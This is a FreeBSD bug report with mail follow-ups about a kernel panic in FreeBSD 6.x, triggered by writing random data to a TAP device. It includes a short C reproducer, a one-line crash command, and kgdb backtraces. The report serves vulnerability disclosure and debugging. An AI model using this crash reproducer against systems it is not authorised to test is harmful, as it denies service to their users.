From nobody@FreeBSD.org  Mon Dec  3 15:08:32 2007
Return-Path: <nobody@FreeBSD.org>
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 95CBF16A417
	for <freebsd-gnats-submit@FreeBSD.org>; Mon,  3 Dec 2007 15:08:32 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21])
	by mx1.freebsd.org (Postfix) with ESMTP id 874D413C4D3
	for <freebsd-gnats-submit@FreeBSD.org>; Mon,  3 Dec 2007 15:08:32 +0000 (UTC)
	(envelope-from nobody@FreeBSD.org)
Received: from www.freebsd.org (localhost [127.0.0.1])
	by www.freebsd.org (8.14.2/8.14.2) with ESMTP id lB3F8DsX080760
	for <freebsd-gnats-submit@FreeBSD.org>; Mon, 3 Dec 2007 15:08:13 GMT
	(envelope-from nobody@www.freebsd.org)
Received: (from nobody@localhost)
	by www.freebsd.org (8.14.2/8.14.1/Submit) id lB3F8DVQ080758;
	Mon, 3 Dec 2007 15:08:13 GMT
	(envelope-from nobody)
Message-Id: <200712031508.lB3F8DVQ080758@www.freebsd.org>
Date: Mon, 3 Dec 2007 15:08:13 GMT
From: Gabor Berczi <gabor@berczi.be>
To: freebsd-gnats-submit@FreeBSD.org
Subject: local/remote kernel DoS through TAP device
X-Send-Pr-Version: www-3.1
X-GNATS-Notify:

>Number:         118399
>Category:       kern
>Synopsis:       [tap] local/remote kernel DoS through TAP device
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    secteam
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 03 15:10:04 UTC 2007
>Closed-Date:    Sat Sep 24 04:16:38 UTC 2011
>Last-Modified:  Sat Sep 24 04:16:38 UTC 2011
>Originator:     Gabor Berczi
>Release:        6.2-RELEASE
>Organization:
>Environment:
Tested on x86/alpha, SMP/non-SMP.


>Description:
There is a bug somewhere in the FreeBSD kernel that causes lockup if the
TAP device receives abnormal data.

..
tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)

fatal kernel trap:

    trap entry     = 0x2 (memory management fault)
    cpuid          = 0
    faulting va    = 0x34
    type           = access violation
    cause          = load instructon
    pc             = 0xfffffc00005dd39c
    ra             = 0xfffffc00005de15c
    sp             = 0xfffffe0007763870
    usp            = 0x11ffd6c0
    curthread      = 0xfffffc0001ef22b0
        pid = 31183, comm = zsh

panic: trap


>How-To-Repeat:
1. Compile this:

#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	if (argc != 2)
		return 1;

	int fd = open(argv[1], O_WRONLY);
	if (fd < 0) {
		perror("open");
		return 1;
	}

	for (;;) {
		char buf[2048];
		int ret = read(0, buf, sizeof(buf));
		if (ret < 0) {
			perror("read");
			close(fd);
			return 1;
		}
		ret = write(fd, buf, ret);
	}

	return 0;
}

2. Load if_tap, and create tap0 device.
3. cat /dev/urandom|./a.out /dev/tap0

Sooner or later it'll die.


>Fix:


>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->secteam 
Responsible-Changed-By: remko 
Responsible-Changed-When: Mon Dec 3 17:16:21 UTC 2007 
Responsible-Changed-Why:  
Thanks for submitting this, it would have been better to submit 
this to the secteam instead -> reassign. 



http://www.freebsd.org/cgi/query-pr.cgi?pr=118399 

From: Robert Watson <rwatson@FreeBSD.org>
To: Gabor Berczi <gabor@berczi.be>
Cc: freebsd-gnats-submit@FreeBSD.org
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Thu, 6 Dec 2007 00:31:41 +0000 (GMT)

 On Mon, 3 Dec 2007, Gabor Berczi wrote:
 
 > There is a bug somewhere in the FreeBSD kernel that causes lockup if the TAP 
 > device receives abnormal data.
 
 As a data point, I tried this on a 7.0BETA4 i386 VM this evening and did not 
 run into the problem.  It seemed to fairly quietly suffer through fairl vast 
 quantities of random data, with occasional complaints from ARP that it had 
 received something that looked like an ARP packet but didn't meet 
 expectations:
 
    arp: unknown hardware address form (0xc32c)
    arp: unknown hardware address format (0x1fff)
    arp: unknwon hardware address format (0x2266)
 
 The oversize packet error in 6.2, found in if_ethersubr.c, is not present in 
 later FreeBSD versions, including 6.3.  Whether the bug is present is another 
 matter...  If someone could give this a spin on 6.2 and confirm the problem 
 there, and on then on 6.3 in the same configuration, that would be useful.
 
 Robert N M Watson
 Computer Laboratory
 University of Cambridge

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: freebsd-gnats-submit@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Sat, 8 Dec 2007 12:12:45 +0100

 I ran it on 6.3-RC1 on my Alpha, and it still died, although no  
 messages this time.
 
 fatal kernel trap:
 
      trap entry     = 0x2 (memory management fault)
      cpuid          = 0
      faulting va    = 0xc6f8
      type           = access violation
      cause          = load instructon
      pc             = 0xfffffc00005f4750
      ra             = 0xfffffc0000642f44
      sp             = 0xfffffe00073adbd0
      curthread      = 0xfffffc0007c722b0
          pid = 20, comm = intr: fxp0
 
 panic: trap
 
 kgdb:
 
 #0  0xfffffc0000596f8c in doadump () at /data/src/sys/kern/ 
 kern_shutdown.c:240
 #1  0xfffffc00005978c8 in boot (howto=260)
      at /data/src/sys/kern/kern_shutdown.c:409
 #2  0xfffffc0000597eb8 in panic (fmt=0xfffffc0007c722b0 "\200\r?\a")
      at /data/src/sys/kern/kern_shutdown.c:565
 #3  0xfffffc000083c1fc in trap (a0=50936, a1=1, a2=0, entry=2,
      framep=0xfffffe00073adaa8) at /data/src/sys/alpha/alpha/trap.c:607
 #4  0xfffffc000082a17c in XentMM () at ./machine/asm.h:93
 #5  0xfffffc00005f4750 in m_length (m0=0xc6e1, last=0x0)
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f44 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d98c in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc00004468d4 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=32 ' ', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc000044646c in fxp_intr (xsc=0xc6e1)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc0000573f1c in ithread_execute_handlers (p=0xc6e1,
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f44 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d98c in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc00004468d4 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=32 ' ', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc000044646c in fxp_intr (xsc=0xc6e1)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc0000573f1c in ithread_execute_handlers (p=0xc6e1,
 ---Type <return> to continue, or q <return> to quit---
      ie=0xfffffc0000c58500) at /data/src/sys/kern/kern_intr.c:682
 #11 0xfffffc0000574114 in ithread_loop (arg=0xc6e1)
      at /data/src/sys/kern/kern_intr.c:766
 #12 0xfffffc0000571f20 in fork_exit (
      callout=0xfffffc0000574080 <ithread_loop>, arg=0xfffffc0000dcd000,
      frame=0xfffffe00073add30) at /data/src/sys/kern/kern_fork.c:788
 #13 0xfffffc000082a388 in XentRestart () at ./machine/asm.h:254
 #14 0x0000000000000000 in ?? ()
 
 -- 
 Gabucino
 

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Sat, 8 Dec 2007 18:10:00 +0100

 On the other hand, I can't reproduce it on 8.0-CURRENT x86.
 
 -- 
 Gabucino
 

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Mon, 10 Dec 2007 10:17:07 +0100

 It's present on 6.3-PRERELEASE:
 
 fatal kernel trap:
 
      trap entry     = 0x2 (memory management fault)
      cpuid          = 0
      faulting va    = 0x6438
      type           = access violation
      cause          = load instructon
      pc             = 0xfffffc00005f4770
      ra             = 0xfffffc0000642f64
      sp             = 0xfffffe00073adbd0
      curthread      = 0xfffffc0007c722b0
          pid = 20, comm = intr: fxp0
 
 panic: trap
 
 #1  0xfffffc0000597c38 in boot (howto=260)
      at /data/src/sys/kern/kern_shutdown.c:409
 #2  0xfffffc0000598228 in panic (fmt=0xfffffc0007c722b0 "\200\r?\a")
      at /data/src/sys/kern/kern_shutdown.c:565
 #3  0xfffffc000083c20c in trap (a0=25656, a1=1, a2=0, entry=2,
      framep=0xfffffe00073adaa8) at /data/src/sys/alpha/alpha/trap.c:607
 #4  0xfffffc000082a18c in XentMM () at ./machine/asm.h:93
 #5  0xfffffc00005f4770 in m_length (m0=0x6420, last=0x0)
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f64 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d9ac in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc0000446c44 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=224 '?', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc00004467dc in fxp_intr (xsc=0x6420)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc000057428c in ithread_execute_handlers (p=0x6420,
      ie=0xfffffc0000c58500) at /data/src/sys/kern/kern_intr.c:682
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f64 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d9ac in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc0000446c44 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=224 '?', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc00004467dc in fxp_intr (xsc=0x6420)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc000057428c in ithread_execute_handlers (p=0x6420,
      ie=0xfffffc0000c58500) at /data/src/sys/kern/kern_intr.c:682
 #11 0xfffffc0000574484 in ithread_loop (arg=0x6420)
      at /data/src/sys/kern/kern_intr.c:766
 #12 0xfffffc0000572290 in fork_exit (
      callout=0xfffffc00005743f0 <ithread_loop>, arg=0xfffffc0000dcd000,
      frame=0xfffffe00073add30) at /data/src/sys/kern/kern_fork.c:788
 #13 0xfffffc000082a398 in XentRestart () at ./machine/asm.h:254
 #14 0x0000000000000000 in ?? ()
 
 -- 
 Gabucino
 
State-Changed-From-To: open->closed 
State-Changed-By: eadler 
State-Changed-When: Sat Sep 24 04:16:36 UTC 2011 
State-Changed-Why:  
Submitter can't reproduce with 8.x If this is still an issue please 
reply and I'll reopen the pr 

http://www.freebsd.org/cgi/query-pr.cgi?pr=118399 
>Unformatted:
